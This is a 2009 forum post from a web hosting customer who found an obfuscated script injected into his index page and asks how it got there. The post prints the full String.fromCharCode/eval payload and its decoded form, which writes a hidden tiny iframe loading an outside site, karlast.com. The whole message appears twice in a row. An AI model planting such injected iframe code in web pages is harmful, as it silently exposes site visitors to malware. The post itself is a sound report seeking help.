scot
06-03-2009, 07:31 AM
After opening my new DASP account last week I replaced the default index.htm page with a very simple html page that only had my domain name centered on the page.
Several days later I noticed a javascript error whenever I loaded the page. When I looked at the source for my new index.htm page there was a mysterious javascript function in the body.
The script was encoded as ascii character codes as follows:
<scripttype="text/javascript">eval(String.fromCharCode
(118,97,114,32,106,104,113,119,61,49,50,51,49,49,4 9,51,43,50,53,59,118,97,114,32,103,
104,103,52,53,61,34,107,97,114,34,59,118,97,114,32 ,119,61,34,108,97,115,116,34,59,118,
97,114,32,114,101,54,61,34,46,34,59,118,97,114,32, 104,50,104,61,34,99,111,109,34,59,118,
97,114,32,97,61,34,105,102,114,34,59,118,97,114,32 ,115,61,34,104,116,116,34,59,100,111,
99,117,109,101,110,116,46,119,114,105,116,101,40,3 9,60,39,43,97,43,39,97,109,101,32,115,
114,39,43,39,99,61,34,39,43,115,43,39,112,58,47,47 ,39,43,103,104,103,52,53,43,39,39,43,119,
43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,3 9,47,39,43,39,34,32,119,105,100,39,43,39,
116,104,61,34,49,34,32,104,39,43,39,101,105,103,10 4,116,61,34,51,34,62,60,47,105,102,39,43,
39,114,39,43,39,97,109,101,62,39,41,59,32,102,117, 110,99,116,105,111,110,32,103,103,54,51,
52,53,40,41,123,118,97,114,32,97,115,51,49,49,51,6 1,57,43,55,53,52,52,59,125,32,118,97,114,
32,109,110,98,113,61,52,51,48,52,49,56,50,52))
</script>
I decoded the ascii stream and it looks like this:
var jhqw=1231113+25;var ghg45="kar";var w="last";var re6=".";var h2h="com";var a="ifr";var s="htt";
document.write('<'+a+'ame sr'+'c="'+s+'p://'+ghg45+''+w+''+re6+''+h2h+'/'+'" wid'+'th="1" h'+'eight="3"></if'+'r'+'ame>');
function gg6345(){var as3113=9+7544;} var mnbq=43041824
Basically it is trying to redirect the browser to a site called "karlast.com". I tried to navigate to the page but it doesn't exist anymore. Most likely a rogue site that has been taken down.
How could this script have gotten into my default page? I have scanned my system for virus/malware and it is clean. No one else has access to my account (at least no one is supposed to have access!).
Thanks, Scott.
Several days later I noticed a javascript error whenever I loaded the page. When I looked at the source for my new index.htm page there was a mysterious javascript function in the body.
The script was encoded as ascii character codes as follows:
<scripttype="text/javascript">eval(String.fromCharCode
(118,97,114,32,106,104,113,119,61,49,50,51,49,49,4 9,51,43,50,53,59,118,97,114,32,103,
104,103,52,53,61,34,107,97,114,34,59,118,97,114,32 ,119,61,34,108,97,115,116,34,59,118,
97,114,32,114,101,54,61,34,46,34,59,118,97,114,32, 104,50,104,61,34,99,111,109,34,59,118,
97,114,32,97,61,34,105,102,114,34,59,118,97,114,32 ,115,61,34,104,116,116,34,59,100,111,
99,117,109,101,110,116,46,119,114,105,116,101,40,3 9,60,39,43,97,43,39,97,109,101,32,115,
114,39,43,39,99,61,34,39,43,115,43,39,112,58,47,47 ,39,43,103,104,103,52,53,43,39,39,43,119,
43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,3 9,47,39,43,39,34,32,119,105,100,39,43,39,
116,104,61,34,49,34,32,104,39,43,39,101,105,103,10 4,116,61,34,51,34,62,60,47,105,102,39,43,
39,114,39,43,39,97,109,101,62,39,41,59,32,102,117, 110,99,116,105,111,110,32,103,103,54,51,
52,53,40,41,123,118,97,114,32,97,115,51,49,49,51,6 1,57,43,55,53,52,52,59,125,32,118,97,114,
32,109,110,98,113,61,52,51,48,52,49,56,50,52))
</script>
I decoded the ascii stream and it looks like this:
var jhqw=1231113+25;var ghg45="kar";var w="last";var re6=".";var h2h="com";var a="ifr";var s="htt";
document.write('<'+a+'ame sr'+'c="'+s+'p://'+ghg45+''+w+''+re6+''+h2h+'/'+'" wid'+'th="1" h'+'eight="3"></if'+'r'+'ame>');
function gg6345(){var as3113=9+7544;} var mnbq=43041824
Basically it is trying to redirect the browser to a site called "karlast.com". I tried to navigate to the page but it doesn't exist anymore. Most likely a rogue site that has been taken down.
How could this script have gotten into my default page? I have scanned my system for virus/malware and it is clean. No one else has access to my account (at least no one is supposed to have access!).
Thanks, Scott.